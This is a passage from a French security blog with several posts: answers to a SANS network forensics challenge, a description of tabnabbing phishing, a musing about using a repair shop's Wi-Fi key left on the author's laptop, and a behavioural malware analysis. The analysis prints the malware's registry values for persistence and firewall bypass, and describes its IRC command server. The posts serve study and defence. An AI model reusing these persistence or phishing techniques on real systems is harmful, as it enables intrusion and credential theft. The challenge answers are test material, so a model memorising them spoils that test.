</div><div><div style="text-align: justify;">Si tout se passe bien vous devriez entendre (sous Mac) une phrase semblable à celle-ci : "Next subway is at 20 hours 45 minutes for Technopôle."</div><div style="text-align: justify;"><br />
</div><div style="text-align: justify;">Cet article et ce script ne me permettent pas de consulter les horaires des prochains métro à partir de mon téléphone comme je le souhaite, mais cela me permet d'avoir une meilleure idée de comment je pourrais faire pour développer un widget ou une application pour Android (si je trouve le temps).<br />
<br />
Maj : Il existe un site internet adapté aux téléphones mobiles pour consulter les horaires, cependant il faut entrer le nom de l'arrêt pour en connaître les horaires, ce qui est peu pratique lorsque l'on n'est pas sûr du nom, de l'orthographe ... </div></div><div class="blogger-post-footer">Don't hesitate to follow me on Twitter : https://twitter.com/steevebarbeau</div>Steeve BARBEAUhttp://www.blogger.com/profile/13290697188569225316noreply@blogger.com0tag:blogger.com,1999:blog-6555208034441643895.post-83002263557728711542010-07-24T21:34:00.004+02:002010-07-24T22:09:31.928+02:00Obtenir l'accès à un réseau Wifi sans effort ou presque<div style="text-align: justify;">Il y a quelques mois, suite à un problème de carte graphique sur mon macbook (et oui, il est équipé de la fameuse 8600M GT, victime d'un problème de surchauffe) je l'ai emporté chez un réparateur agréé par Apple pour faire un diagnostique. Par chance, la réparation fût gratuite grâce à la reconnaissance d'Apple du problème sur les cartes graphiques Nvidia. Enfin bref, ceci n'est guère important, venons en à la partie la plus "fun" de l'histoire.</div><div style="text-align: justify;"><br />
</div><div style="text-align: justify;"><br />
</div><div style="text-align: justify;"><a class="vt-p" href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi2r1qyVQVq_ZOV_-XcPXNAcNTASSUOiW91nRr7AagYa19zeecwkgnHXaewo06k5EXR_GMySCHaHuxUSSEiPEW0HSpq3tmv9bD1qBsYYz7gTX4Y80mM9k0kxI0DrI5RDfQ5hGNFycfwTQ30/s1600/Screen+shot+2010-04-17+at+6.59.43+PM+2.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi2r1qyVQVq_ZOV_-XcPXNAcNTASSUOiW91nRr7AagYa19zeecwkgnHXaewo06k5EXR_GMySCHaHuxUSSEiPEW0HSpq3tmv9bD1qBsYYz7gTX4Y80mM9k0kxI0DrI5RDfQ5hGNFycfwTQ30/s320/Screen+shot+2010-04-17+at+6.59.43+PM+2.png" /></a>Donc quelques semaines après avoir récupéré mon mac, je suis allé dans l'application "Keychain Access", fournie avec Mac OS, qui stocke tous les mots de passe saisis dans les applications et que l'on ne souhaite pas ressaisir à chaque instant, mais aussi ceux des partages réseaux (ex : serveur SMB ...) et les clés des points d'accès Wifi. C'est ainsi que j'ai pu trouver celui utilisé dans le centre de réparation où mon petit macbook avait séjourné quelques jours.</div><br />
<br />
<br />
<br />
Quelques infos concernant la clé, elle fait dix caractères (lettres et chiffres) dont le nom du réparateur ce qui est pas top niveau sécurité (en plus d'entrer cette clé sur les ordinateurs des clients ...). J'espère pour eux qu'ils n'enregistrent pas la clé de leur réseau Wifi sur tous les ordinateurs qu'ils réparent, autrement ils se mettent réellement en danger.<br />
<div style="text-align: justify;"><br />
</div><div style="text-align: justify;">Pour conclure, on pourrait se poser la question si au niveau de la loi, sachant que la clé m'a été (involontairement) communiquée, j'ai le droit d'utiliser leur réseau pour accéder à Internet ?<br />
<br />
</div><div class="blogger-post-footer">Don't hesitate to follow me on Twitter : https://twitter.com/steevebarbeau</div>Steeve BARBEAUhttp://www.blogger.com/profile/13290697188569225316noreply@blogger.com0tag:blogger.com,1999:blog-6555208034441643895.post-77869425693723511222010-07-10T11:03:00.002+02:002010-07-10T13:41:26.882+02:00Ann's Aurora, un challenge d'investigation numérique proposé par le SANS<div style="text-align: justify;">Au mois de juin, le SANS a proposé sur son site un <a class="vt-p" href="http://computer-forensics.sans.org/challenges/">challenge</a> d'investigation numérique sur une capture de traffic réseau. Ce challenge n'est pas le premier que le SANS organise, mais c'était d'après eux l'un des plus compliqué.</div><div style="text-align: justify;">Le but de ce challenge était donc de répondre a un peu plus de 10 questions en analysant le fichier evidence06.pcap. Dans cette capture, seulement 2 machines intéragissent entre elles, l'une est victime (10.10.10.70) d'une attaque similaire à "<a class="vt-p" href="http://fr.wikipedia.org/wiki/Op%C3%A9ration_Aurora">l'opération Aurora</a>" et l'autre (10.10.10.10) est la machine contrôlée par l'attaquant.</div><div style="text-align: justify;"><br />
</div><div style="text-align: justify;">Si vous souhaitez faire ce challenge, ne lisez pas la suite avant d'avoir cherché, car je vais vous donner les réponses et indiquer les erreurs que j'ai commis.<br />
<br />
<br />
</div><div style="text-align: justify;"><br />
</div><div style="text-align: justify;">1) What was the full URI of Vick Timmes' original web request? (Please include the port in your URI.)</div><div style="text-align: justify;"><i>Answer : http://10.10.10.10:8080/index.php</i></div><div style="text-align: justify;"><br />
</div><div style="text-align: justify;">2) In response, the malicious web server sent back obfuscated JavaScript. Near the beginning of this code, the attacker created an array with 1300 elements labeled "COMMENT", then filled their data element with a string. What was the value of this string?</div><div style="text-align: justify;"><i>Answer : vEI</i></div><div style="text-align: justify;"><br />
</div><div style="text-align: justify;">3) Vick's computer made a second HTTP request for an object.</div><div style="text-align: justify;"> a) What was the filename of the object that was requested?</div><div style="text-align: justify;"><i>Answer : index.phpmfKSxSANkeTeNrah.gif</i></div><div style="text-align: justify;"><br />
</div><div style="text-align: justify;"> b) What is the MD5sum of the object that was returned?</div><div style="text-align: justify;"><i>Answer : df3e567d6f16d040326c7a0ea29a4f41</i></div><div style="text-align: justify;"><br />
</div><div style="text-align: justify;">4) When was the TCP session on port 4444 opened? (Provide the number of seconds since the beginning of the packet capture, rounded to tenths of a second. ie, 49.5 seconds)</div><div style="text-align: justify;"><i>Answer : 1.3 seconds</i></div><div style="text-align: justify;"><br />
</div><div style="text-align: justify;">5) When was the TCP session on port 4444 closed? (Provide the number of seconds since the beginning of the packet capture, rounded to tenths of a second. ie, 49.5 seconds)</div><div style="text-align: justify;"><i>Answer : 87.6 seconds</i></div><div style="text-align: justify;"><br />
</div><div style="text-align: justify;">6) In packet 17, the malicious server sent a file to the client.</div><div style="text-align: justify;"> a) What type of file was it? Choose one:</div><ul><li style="text-align: justify;">Windows executable</li>
<li style="text-align: justify;">GIF image</li>
<li style="text-align: justify;">PHP script</li>
<li style="text-align: justify;">Zip file</li>
<li style="text-align: justify;">Encrypted data</li>
</ul><div style="text-align: justify;"><i>Answer : Windows executable</i></div><div style="text-align: justify;"><br />
</div><div style="text-align: justify;"> b) What was the MD5sum of the file?</div><div style="text-align: justify;"><i>Answer : b062cb8344cd3e296d8868fbef289c7c</i></div><div style="text-align: justify;"><br />
</div><div style="text-align: justify;">7) Vick's computer repeatedly tried to connect back to the malicious server on port 4445, even after the original connection on port 4444 was closed. With respect to these repeated failed connection attempts:</div><div style="text-align: justify;"> a) How often does the TCP initial sequence number (ISN) change? (Choose one.)</div><ul><li style="text-align: justify;">Every packet</li>
<li style="text-align: justify;">Every third packet</li>
<li style="text-align: justify;">Every 10-15 seconds</li>
<li style="text-align: justify;">Every 30-35 seconds</li>
<li style="text-align: justify;">Every 60 seconds</li>
</ul><div style="text-align: justify;"><i>Answer : Every third packet</i></div><div style="text-align: justify;"><br />
</div><div style="text-align: justify;"> b) How often does the IP ID change? (Choose one.)</div><ul><li style="text-align: justify;">Every packet</li>
<li style="text-align: justify;">Every third packet</li>
<li style="text-align: justify;">Every 10-15 seconds</li>
<li style="text-align: justify;">Every 30-35 seconds</li>
<li style="text-align: justify;">Every 60 seconds</li>
</ul><div style="text-align: justify;"><i>Answer : Every packet</i></div><div style="text-align: justify;"><br />
</div><div style="text-align: justify;"> c) How often does the source port change? (Choose one.)</div><ul><li style="text-align: justify;">Every packet</li>
<li style="text-align: justify;">Every third packet</li>
<li style="text-align: justify;">Every 10-15 seconds</li>
<li style="text-align: justify;">Every 30-35 seconds</li>
<li style="text-align: justify;">Every 60 seconds</li>
</ul><div style="text-align: justify;"><i>Answer : Every 10-15 seconds</i></div><div style="text-align: justify;"><br />
</div><div style="text-align: justify;">8) Eventually, the malicious server responded and opened a new connection. When was the TCP connection on port 4445 first successfully completed? (Provide the number of seconds since the beginning of the packet capture, rounded to tenths of a second. ie, 49.5 seconds)</div><div style="margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;"><div style="text-align: justify;"><i>Answer : 123.7</i></div></div><div style="text-align: justify;"><br />
</div><div style="text-align: justify;">9) Subsequently, the malicious server sent an executable file to the client on port 4445. What was the MD5 sum of this executable file?</div><div style="margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;"><div style="text-align: justify;"><i>Answer : b062cb8344cd3e296d8868fbef289c7c</i></div></div><div style="text-align: justify;"><br />
</div><div style="text-align: justify;">10) When was the TCP connection on port 4445 closed? (Provide the number of seconds since the beginning of the packet capture, rounded to tenths of a second. ie, 49.5 seconds)</div><div style="text-align: justify;"><i>Answer : 198.4</i></div><div style="text-align: justify;"><br />
</div><div style="text-align: justify;"><br />
</div><div style="text-align: justify;">J'ai donc commis 2 erreurs : l'une à la question 2 et l'autre à la question 7a. </div><div style="text-align: justify;">Pour la seconde question, j'avais indiqué une chaine de caractères commençant par "\u0c0f\u0c0d..." car au début, le tableau est bien initialisé avec "vEI" mais plus loin dans le code javascript cette chaine de caractère est remplacée par celle que je croyais être la bonne réponse. </div><div style="text-align: justify;">Concernant la question 7a), Wireshark m'indiquait "Sequence number : 0 (relative sequence number) ce qui m'a induis en erreur. Pour trouver le numéro de séquence correct, il fallait que je regarde le contenu du paquet au format héxadécimal puis que je convertis en décimal, la valeur correspondant au numéro de séquence recherché. Une autre solution plus intuitive aurait été de désactiver l'option "Relative sequence numbers and window scaling" en faisant un clic droit dans la partie affichant une vue détaillée du paquet puis en allant dans le sous-menu "Protocol Preferences".</div><div style="text-align: justify;"><br />
</div><div style="text-align: justify;">J'ai trouvé ce petit challenge très intéressant et j'espère que d'autres suivront, afin que cette fois-ci je sois dans les finalistes :)</div><div style="text-align: justify;"><br />
</div><div style="text-align: justify;">Billet annonçant les gagnants du challenge : <a class="vt-p" href="http://forensicscontest.com/2010/07/09/puzzle-6-winners">http://forensicscontest.com/2010/07/09/puzzle-6-winners</a></div><div style="text-align: left;">Solution du gagnant : <a class="vt-p" href="http://forensicscontest.com/contest06/Finalists/Wesley_McGrew/narrative.txt">http://forensicscontest.com/contest06/Finalists/Wesley_McGrew/narrative.txt</a></div><div style="text-align: left;">Autre solution intéressante : <a class="vt-p" href="http://chatteronthewire.blogspot.com/2010/06/forensic-contest-6-answer.html">http://chatteronthewire.blogspot.com/2010/06/forensic-contest-6-answer.html</a></div><div style="text-align: left;"><br />
</div><div class="blogger-post-footer">Don't hesitate to follow me on Twitter : https://twitter.com/steevebarbeau</div>Steeve BARBEAUhttp://www.blogger.com/profile/13290697188569225316noreply@blogger.com0tag:blogger.com,1999:blog-6555208034441643895.post-62651890991102577752010-06-17T23:35:00.002+02:002010-07-24T22:08:27.397+02:00OpenOffice en mode pare-feu : OOwall<div style="text-align: justify;">Début avril 2009, lors de la création du projet de loi Hadopi, Christine Albanel, notre (ex) ministre de la culture nous apprenait que son ministère était protégé par le pare-feu OpenOffice. A l'époque cet événement a fait un gros buzz sur le net, car des millions de personnes utilisent la suite bureautique OpenOffice, mais personne ne savait comment l'utiliser comme pare-feu (a part Christine).</div><div style="text-align: justify;"><br />
</div><div style="text-align: justify;"><object height="360" width="480"><param name="movie" value="http://www.dailymotion.com/swf/video/x8ury3"></param><param name="allowFullScreen" value="true"></param><param name="allowScriptAccess" value="always"></param><embed type="application/x-shockwave-flash" src="http://www.dailymotion.com/swf/video/x8ury3" width="480" height="360" allowfullscreen="true" allowscriptaccess="always"></embed></object></div><div style="text-align: justify;"><br />
</div><div style="text-align: justify;">Depuis hier, la technique utilisée par le ministère de la culture (joke inside) a été révélée par Pierre Chifflier (alias Pollux), un expert en sécurité français.</div><div style="text-align: justify;"><br />
</div><div style="text-align: justify;">Pour faire fonctionner ce pare-feu next-gen, on a besoin de :</div><div style="text-align: justify;">- OpenOffice qui permet de choisir les ports à filtrer et de générer en temps réel des graphiques récapitulant les paquets bloqués et ceux autorisés</div><div style="text-align: justify;">- python-uno pour manipuler OpenOffice</div><div style="text-align: justify;">- nfqueue afin de filtrer les paquets en langage de haut niveau</div><div style="text-align: justify;">- netfilter</div><div style="text-align: justify;"><br />
</div><div style="text-align: justify;">Ci-dessous, un schéma montrant les relations entre les différents composants de ce pare-feu :</div><div class="separator" style="clear: both; text-align: justify;"><a class="vt-p" href="http://www.wzdftpd.net/blog/images/design_oowall.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="223" src="http://www.wzdftpd.net/blog/images/design_oowall.png" width="320" /></a></div><div class="separator" style="clear: both; text-align: justify;">Sur le schéma, on peut remarquer une communication client-serveur XML-RPC, elle permet aux outils de la partie "pare-feu" exécutés en root, de communiquer avec la Console d'administration sans que cette dernière ne soit elle-même exécutée en root.</div><div class="separator" style="clear: both; text-align: justify;"><br />
</div><div class="separator" style="clear: both; text-align: justify;">Ci-dessous, un aperçu de l'interface "d'administration" du pare-feu OpenOffice :</div><div class="separator" style="clear: both; text-align: left;"></div><div style="text-align: justify;"><br />
</div><div style="text-align: justify;"><a class="vt-p" href="http://www.wzdftpd.net/blog/images/oowall_02.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><span class="Apple-style-span" style="color: black;"></span></a><a class="vt-p" href="http://www.wzdftpd.net/blog/images/oowall_02.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="223" src="http://www.wzdftpd.net/blog/images/oowall_02.png" width="320" /></a></div><br />
<div class="separator" style="clear: both; text-align: justify;"><br />
</div><div class="separator" style="clear: both; text-align: justify;">Pour ceux qui souhaitent avoir plus d'informations et télécharger les sources d'OOwall, cela se passe sur le <a class="vt-p" href="http://www.wzdftpd.net/blog/index.php?2010/06/16/46-le-pare-feu-openoffice">blog de Pollux</a>.</div><div class="separator" style="clear: both; text-align: justify;"><br />
</div><div class="blogger-post-footer">Don't hesitate to follow me on Twitter : https://twitter.com/steevebarbeau</div>Steeve BARBEAUhttp://www.blogger.com/profile/13290697188569225316noreply@blogger.com0tag:blogger.com,1999:blog-6555208034441643895.post-37678917093196962702010-05-27T23:06:00.005+02:002010-07-24T22:08:38.204+02:00Tabnabbing, the future of phishing attacks<div style="text-align: justify;">Aza Raskin has discovered a new kind of phishing attack which permits to deceive the user when he navigates on the attacker's website and he determines to look a website in an other tab. Actually, it works also if the user use multiple browser windows but it's less stealthy. This attack works on all browsers (there is a little bug with the favicon on Safari).</div><div style="text-align: justify;"><br />
</div><div style="text-align: justify;">Tabnabbing is very simple to understand and implement. So when the user navigates on the attacker's website, a javascript code is executed and wait that the user go on an other tab (without close the first). If the first tab has lost the focus for more than 5 seconds, in the second tab, the favicon, title and content of the webpage change thanks to the javascript code. There is little chance that the user see the title and favicon changement because he is navigating the second website. When the user come back to his first tab, he will see the "new page" wich can look-like to his webmail. And if he logs on it, the attacker will get his credentials.</div><div style="text-align: justify;"><br />
</div><div style="text-align: justify;">If you want to test this you can go <a class="vt-p" href="http://www.azarask.in/blog/post/a-new-type-of-phishing-attack/">here</a> or you can see his Proof of Concept in video :<br />
<br />
</div><div style="text-align: justify;"><object height="267" width="400"><param name="allowfullscreen" value="true" /><param name="allowscriptaccess" value="always" /><param name="movie" value="http://vimeo.com/moogaloop.swf?clip_id=12003099&server=vimeo.com&show_title=1&show_byline=1&show_portrait=0&color=&fullscreen=1" /><embed src="http://vimeo.com/moogaloop.swf?clip_id=12003099&server=vimeo.com&show_title=1&show_byline=1&show_portrait=0&color=&fullscreen=1" type="application/x-shockwave-flash" allowfullscreen="true" allowscriptaccess="always" width="400" height="267"></embed></object></div><div style="text-align: justify;"><br />
</div><div style="text-align: justify;">This new phishing attack can be improved with an <a class="vt-p" href="http://www.azarask.in/blog/post/socialhistoryjs/">other</a> technique (using Javascript and CSS), which permits to know some websites the user has visited before.</div><br />
<br />
Raskin's article : <a class="vt-p" href="http://www.azarask.in/blog/post/a-new-type-of-phishing-attack/">http://www.azarask.in/blog/post/a-new-type-of-phishing-attack/</a><br />
His Wikipedia's page : <a class="vt-p" href="http://en.wikipedia.org/wiki/Aza_Raskin">http://en.wikipedia.org/wiki/Aza_Raskin</a><br />
His Twitter : <a class="vt-p" href="http://twitter.com/azaaza">http://twitter.com/azaaza</a><br />
POC : <a class="vt-p" href="http://www.azarask.in/projects/bgattack.js">http://www.azarask.in/projects/bgattack.js</a><div class="blogger-post-footer">Don't hesitate to follow me on Twitter : https://twitter.com/steevebarbeau</div>Steeve BARBEAUhttp://www.blogger.com/profile/13290697188569225316noreply@blogger.com0tag:blogger.com,1999:blog-6555208034441643895.post-12722991144148890992010-05-11T19:31:00.008+02:002010-07-24T22:08:55.506+02:00Analyse comportementale d'un malware<div><div style="text-align: justify;"><b><span class="Apple-style-span" style="font-family: inherit;"><br />
</span> </b><br />
<b><span class="Apple-style-span" style="font-family: inherit;"><span class="Apple-style-span" style="font-size: x-large;">1 - Mise en situation</span></span></b></div></div><div><div style="text-align: justify;"><span class="Apple-style-span" style="font-family: inherit;"><br />
</span> </div><div style="text-align: justify;"><span class="Apple-style-span" style="font-family: inherit;">Depuis quelques jours déjà, lorsque je me connecte avec mon logiciel de messagerie instantanée préféré (Adium :)) sur MSN je reçois de la part d'un de mes contacts des messages me proposant d'aller voir des photos. Je pense que vous avez déjà reçu des messages de ce type car malheureusement beaucoup de gens tombent dans le panneau et cliquent sur ces liens. Puisque ce type de messages m'agace, j'ai voulu regarder de plus près comment cela fonctionne et pourquoi tant de gens se font contaminer par ce type de malwares utilisant les logiciels de messagerie instantanée tel que MSN pour se répandre.</span></div></div><div><div style="text-align: justify;"><span class="Apple-style-span" style="font-family: inherit;"><br />
</span> </div></div><div><div style="text-align: justify;"><span class="Apple-style-span" style="font-family: inherit;">Dans le cas de ce malware, j'ai reçu par l'intermédiaire de mon contact plusieurs messages du type "</span><i><span class="Apple-style-span" style="font-family: inherit;">regardez cette photo :D http://tinyurl.com/###</span></i><span class="Apple-style-span" style="font-family: inherit;">" ou ### varie d'un message à l'autre. Ces liens ont rapidement été identifiés comme une utilisation illégale du service TinyURL et ne sont plus actifs. Les 2 liens TinyURL que j'ai testé renvoyais vers des URLs différentes et proposaient donc de télécharger des fichiers différents : un nommé IMAGE.JPG.exe et l'autre pict20100501_jpg.scr (format des écrans de veille Windows). Ces 2 fichiers sont hébergés sur le même serveur hébergé au Royaume Uni.</span></div></div><div><div style="text-align: justify;"><span class="Apple-style-span" style="font-family: inherit;"><br />
</span> </div></div><div><div class="separator" style="clear: both; text-align: center;"><a class="vt-p" href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj-KWJESaHzK1Ad8vMRlsEB_fSRZ0QFbEKL973r4LNSaNjMZW7goR8ngL5BG7Ez9v8UUsft06YQ1hbct927IQO8-AA0CaKhqjoekKtu04HlqiVilRD4An1mueC3QHWtZiFbkvMrkoTm_VZE/s1600/file_icones.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em; text-align: justify;"><span class="Apple-style-span" style="font-family: inherit;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj-KWJESaHzK1Ad8vMRlsEB_fSRZ0QFbEKL973r4LNSaNjMZW7goR8ngL5BG7Ez9v8UUsft06YQ1hbct927IQO8-AA0CaKhqjoekKtu04HlqiVilRD4An1mueC3QHWtZiFbkvMrkoTm_VZE/s320/file_icones.png" /></span></a></div><div style="text-align: justify;"><span class="Apple-style-span" style="font-family: inherit;">On peut remarquer que l'auteur du malware essaie de tromper l'utilisateur quand au type réel du fichier. Par exemple, le premier est nommé IMAGE.JPG.exe ce qui lorsque l'on active pas l'affichage des extensions sous Windows donne IMAGE.JPG, donc l'utilisateur croit avoir affaire à une vraie image et l'ouvre inconsciemment. Concernant le second fichier, l'icone utilisée est la même que celle des images de type JPEG et comme pour le premier fichier, l'auteur ruse sur le nom de fichier, ce qui donne un fichier visuellement très proche d'une vraie image. Cependant, je ne comprend pas pourquoi l'auteur n'a pas utilisé l'icône des fichiers JPEG pour le fichier exécutable et pourquoi il a terminé le nom du second fichier par _jpg.scr et pas par .jpg.scr afin de tromper plus facilement la victime... </span></div></div><div><div style="text-align: justify;"><span class="Apple-style-span" style="font-family: inherit;"><br />
</span> </div></div><div><div style="text-align: justify;"><i><span class="Apple-style-span" style="font-family: inherit;">Petit conseil : si vous recevez un message écrit en anglais d'une personne française (ou qui ne parle pas anglais) ou si le message vous vouvoie alors que le message provient d'un contact proche qui habituellement vous tutoie (comme c'est le cas ici), il y a de grandes chances pour que ce message provienne d'un malware.</span></i></div></div><div><div style="text-align: justify;"><span class="Apple-style-span" style="font-family: inherit;"><br />
</span> </div></div><div><div style="text-align: justify;"><span class="Apple-style-span" style="font-family: inherit;"><br />
</span> </div></div><div><div style="text-align: justify;"><div style="text-align: left;"><b><span class="Apple-style-span" style="font-family: inherit;"><span class="Apple-style-span" style="font-size: x-large;">2 - Analyse comportementale du malware</span></span></b></div></div><div style="text-align: justify;"><div style="text-align: left;"><b><span class="Apple-style-span" style="font-family: inherit;"><br />
</span> </b></div></div></div><div><div style="text-align: justify;"><div style="text-align: left;"><b><span class="Apple-style-span" style="font-family: inherit;">2.1 - Au niveau du système de fichiers</span></b></div></div></div><div><div style="text-align: justify;"><span class="Apple-style-span" style="font-family: inherit;"><br />
</span> </div><div style="text-align: justify;"><span class="Apple-style-span" style="font-family: inherit;">Pour comprendre le fonctionnement de ce malware, j'ai utilisé un Windows XP SP2 Professionnel de base (sans mises à jour) dans une machine virtuelle (VMware Fusion) afin de pouvoir facilement contrôler le risque lié à ce logiciel malveillant. VMware permet aussi de faire des snapshots ce qui est très pratique pour jongler entre plusieurs "états" de la VM.</span></div></div><div><div style="text-align: justify;"><span class="Apple-style-span" style="font-family: inherit;"><br />
</span> </div></div><div><div style="text-align: justify;"><span class="Apple-style-span" style="font-family: inherit;">J'ai commencé par observer ce que faisait ce malware lorsqu'on le lançait. Je me suis donc muni d'outils tels que Regshot et CaptureBAT ce qui m'a permis de voir que le malware modifiait le registre Windows et créait le fichier </span><i><span class="Apple-style-span" style="font-family: inherit;">C:\WINDOWS\secfil.exe</span></i><span class="Apple-style-span" style="font-family: inherit;">. Celui-ci est invisible dans explorer.exe (même avec l'affichage des fichiers cachés activé) et dans l'interpréteur de commande cmd.exe par contre l'autocomplétion dans cmd.exe révèle sa présence. On y a également accès à partir d'un liveCD linux de type Backtrack ou autre.</span><br />
<br />
</div><div style="text-align: justify;"></div><div style="text-align: justify;"><div class="separator" style="clear: both; text-align: center;"><a class="vt-p" href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEglIn-_3thcLCv6gZ1mDhNNlEcg7ga1yvnuwqlCsaTHEITs1XGKbVlPHoLYcty-_5Bz_4Rf7K97qUbIjApaLwko1jyJIb_CgsmS0IBzjkM_z2GUw-T4DNCZIwZpwyIYvJTt-tdW2ojmPPYl/s1600/ubuntu_windir.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="56" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEglIn-_3thcLCv6gZ1mDhNNlEcg7ga1yvnuwqlCsaTHEITs1XGKbVlPHoLYcty-_5Bz_4Rf7K97qUbIjApaLwko1jyJIb_CgsmS0IBzjkM_z2GUw-T4DNCZIwZpwyIYvJTt-tdW2ojmPPYl/s400/ubuntu_windir.png" width="400" /></a></div><br />
</div><div style="text-align: justify;">Ce malware utilise des techniques de dissimulation semblables à celles utilisées par les rootkits afin de se cacher dans le système de fichiers, cependant il est visible dans la liste des processus en cours (ex : Gestionnaire des tâches).</div></div><div><div style="text-align: justify;"><span class="Apple-style-span" style="font-family: inherit;">Le fichier secfil.exe est exactement le même que IMAGE.JPG.exe, car ce dernier lors de sa première exécution s'est auto-copié dans C:\WINDOWS afin que le système victime soit toujours infecté après la suppression du fichier original.</span></div></div><div><div style="text-align: justify;"><span class="Apple-style-span" style="font-family: inherit;"><br />
</span> </div></div><div><div style="text-align: justify;"><span class="Apple-style-span" style="font-family: inherit;"><br />
</span> </div></div><div><div style="text-align: justify;"><b><span class="Apple-style-span" style="font-family: inherit;">2.2 - Dans le registre Windows</span></b></div><div style="text-align: justify;"><span class="Apple-style-span" style="font-family: inherit;"><br />
</span> </div></div><div><div style="text-align: justify;"><span class="Apple-style-span" style="font-family: inherit;">Au niveau du registre Windows, le malware s'autorise auprès du pare-feu Windows grâce à l'ajout de ces valeurs :</span></div></div><div><div style="text-align: justify;"><span class="Apple-style-span" style="font-family: inherit;"><br />
</span> </div></div><div><div style="text-align: left;"><i><span class="Apple-style-span" style="font-family: inherit;">HKLM\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List\C:\Documents and Settings\Administrateur\Bureau\IMAGE.JPG.exe: "C:\Documents and Settings\Administrateur\Bureau\IMAGE.JPG.exe:*:Enabled:Userinit"</span></i></div></div><div><div style="text-align: left;"><i><span class="Apple-style-span" style="font-family: inherit;"><br />
</span> </i><i><span class="Apple-style-span" style="font-family: inherit;"> </span></i></div></div><div><div style="text-align: left;"><i><span class="Apple-style-span" style="font-family: inherit;">HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List\C:\Documents and Settings\Administrateur\Bureau\IMAGE.JPG.exe: "C:\Documents and Settings\Administrateur\Bureau\IMAGE.JPG.exe:*:Enabled:Userinit"</span></i></div></div><div><div style="text-align: left;"></div></div><div><div style="text-align: justify;"><span class="Apple-style-span" style="font-family: inherit;"><br />
</span> </div><div style="text-align: justify;"><span class="Apple-style-span" style="font-family: inherit;">Si on déchiffre ceci, on voit que le malware s'autorise à accéder à n'importe quel machine accessible sur le réseau local et sur Internet (*), que la règle est activée au niveau du pare-feu (Enabled) et que son nom est "Userinit".</span></div></div><div><div style="text-align: justify;"><div class="separator" style="clear: both; text-align: center;"><a class="vt-p" href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjqvZagNHe-Kp-RZN9g6WAMRztgJyh9BxkQ6tm_6ZDLNL0XGZjYgahyphenhyphen9X99ke1aOSrO2GHRGmNZFFfju6D8UiRprj_OkIWvVYpT_MnQo3jo7pO9Zr-78u99u5F-Z_M3gUtdredVmVTASJiv/s1600/FW.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><span class="Apple-style-span" style="font-family: inherit;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjqvZagNHe-Kp-RZN9g6WAMRztgJyh9BxkQ6tm_6ZDLNL0XGZjYgahyphenhyphen9X99ke1aOSrO2GHRGmNZFFfju6D8UiRprj_OkIWvVYpT_MnQo3jo7pO9Zr-78u99u5F-Z_M3gUtdredVmVTASJiv/s320/FW.png" /></span></a></div><span class="Apple-style-span" style="font-family: inherit;"><br />
</span> </div></div><div><div style="text-align: justify;"><span class="Apple-style-span" style="font-family: inherit;">Il modifie également une valeur du registre pour être exécuté au démarrage de Windows (avant explorer.exe) :</span></div></div><div><div style="text-align: justify;"><span class="Apple-style-span" style="font-family: inherit;"><br />
</span> </div></div><div><div style="text-align: left;"><i><span class="Apple-style-span" style="font-family: inherit;">HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit: "C:\WINDOWS\system32\userinit.exe,C:\WINDOWS\secfil.exe"</span></i></div></div><div><div style="text-align: left;"><span class="Apple-style-span" style="font-family: inherit;"><br />
</span> </div></div><div><div style="text-align: justify;"><span class="Apple-style-span" style="font-family: inherit;"><br />
</span> </div></div><div><div style="text-align: justify;"><b><span class="Apple-style-span" style="font-family: inherit;">2.3 - Mais comment communique t-il ? </span></b></div><div style="text-align: justify;"><span class="Apple-style-span" style="font-family: inherit;"><br />
</span> </div></div><div><div style="text-align: justify;"><span class="Apple-style-span" style="font-family: inherit;">En analysant les paquets sortants avec Wireshark j'ai pu voir qu'au démarrage de ma VM, le malware se connecte à un serveur IRC qui permet au botmaster de donner des ordres à tous les bots dont ma VM. Le malware ne se connecte pas toujours sur le même serveur IRC, ainsi j'en ai trouvé 3 :</span></div></div><div><div style="text-align: justify;"><span class="Apple-style-span" style="font-family: inherit;"><br />
</span> </div></div><div><div style="text-align: justify;"><span class="Apple-style-span" style="font-family: inherit;">- 2.nomdedomaine.com (situé au Royaume-uni, et enregistré le 22-03-2010)</span></div></div><div><div style="text-align: justify;"><span class="Apple-style-span" style="font-family: inherit;">- irc.nomdedomaine0.com (situé à Chicago, USA)</span></div></div><div><div style="text-align: justify;"><span class="Apple-style-span" style="font-family: inherit;">- irc.nomdedomaine000.com (situé en Serbie Monténégro)</span></div></div><div><div style="text-align: justify;"><span class="Apple-style-span" style="font-family: inherit;"><br />
</span> </div></div><div><div style="text-align: justify;"><span class="Apple-style-span" style="font-family: inherit;">Il en est de même pour le port de destination qui est soit 1234 soit 1241.</span></div></div><div><div style="text-align: justify;"><span class="Apple-style-span" style="font-family: inherit;"><br />
</span> <br />
